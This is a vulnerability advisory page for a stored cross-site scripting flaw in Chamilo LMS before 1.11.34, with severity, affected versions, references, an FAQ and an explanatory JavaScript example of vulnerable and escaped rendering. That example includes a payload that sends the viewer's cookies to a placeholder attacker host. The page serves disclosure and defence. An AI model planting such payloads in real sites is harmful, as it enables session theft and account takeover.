Vulnerability Description
Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scripting (XSS) vulnerability. By injecting malicious JavaScript into the course learning path Settings field, an attacker with a low-privileged account (e.g., trainer) can execute arbitrary JavaScript code in the context of any other user viewing the course information page, including administrators. This allows an attacker to exfiltrate sensitive session cookies or tokens, resulting in account takeover (ATO) of higher-privileged users. This issue has been patched in version 1.11.34.
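The mechanics behind a stored XSS of this kind, as an added illustration that is not code from Chamilo or from the advisory: a free-text settings value is concatenated into the page that other users view, so an attacker-supplied tag runs in the viewer's browser. The payload, the attacker hostname (`attacker.example`), the wrapper markup and all function names below are constructed for the example; the real injection point and fix in Chamilo are only described by the advisory, not reproduced here.

```javascript
// Added example (not Chamilo code): a stored, user-controlled settings value
// rendered into a page viewed by higher-privileged users, shown in its
// vulnerable and in its output-encoded form.

// Constructed payload of the kind a low-privileged user could store in a
// free-text settings field. When rendered raw, it sends the viewer's cookies
// to an attacker-controlled host (placeholder hostname).
const STORED_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/c?\'' +
  '+encodeURIComponent(document.cookie))">';

// Vulnerable pattern: the stored value is interpolated into HTML unchanged,
// so the browser parses the injected <img> and fires its onerror handler.
function renderCourseInfoVulnerable(settingsValue) {
  return `<div class="lp-settings">${settingsValue}</div>`;
}

// Fix for the HTML text context: encode the five HTML metacharacters so the
// value is displayed as text and never parsed as markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderCourseInfoFixed(settingsValue) {
  return `<div class="lp-settings">${escapeHtml(settingsValue)}</div>`;
}

// Regression check usable in a test suite: does the rendered HTML contain any
// tag name outside the set the template itself emits? A real test would parse
// the HTML; a tag-name scan is enough to tell the two renderings apart.
function hasUnexpectedTags(html, allowedTags) {
  const allowed = new Set(allowedTags.map((t) => t.toLowerCase()));
  const tagRe = /<\/?([a-zA-Z][\w-]*)/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    if (!allowed.has(m[1].toLowerCase())) return true;
  }
  return false;
}

// Stand-alone demonstration.
console.log('vulnerable render leaks a tag:',
  hasUnexpectedTags(renderCourseInfoVulnerable(STORED_PAYLOAD), ['div']));
console.log('fixed render leaks a tag:',
  hasUnexpectedTags(renderCourseInfoFixed(STORED_PAYLOAD), ['div']));
```

Two caveats a practitioner would want: entity encoding as above is correct only for the HTML text context; a value placed inside an attribute, a URL or inline script needs the encoding for that context instead. And marking the session cookie `HttpOnly` blocks the `document.cookie` exfiltration in the payload but not the attack, since injected script can still issue authenticated requests as the viewing administrator; the fix is output encoding at the rendering site, which is what upgrading to 1.11.34 provides.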
CVSS Score
9.0 (CRITICAL)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Chamilo | Chamilo Lms | < 1.11.34 |
Related Weaknesses (CWE)
References
- https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.34 (Product, Release Notes)
- https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-pxrh-3rcp-h7m6 (Vendor Advisory)
FAQ
What is CVE-2025-59542?
CVE-2025-59542 is a vulnerability with a CVSS score of 9.0 (CRITICAL). Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scripting (XSS) vulnerability. By injecting malicious JavaScript into the course learning path Settings ...
How severe is CVE-2025-59542?
CVE-2025-59542 has been rated CRITICAL with a CVSS base score of 9.0/10. This is considered a critical vulnerability requiring immediate attention.
Is there a patch for CVE-2025-59542?
Yes. The issue is fixed in Chamilo LMS version 1.11.34; all earlier versions are affected. See the vendor advisory and release notes in the references section above for details. Affected products include: Chamilo Chamilo Lms.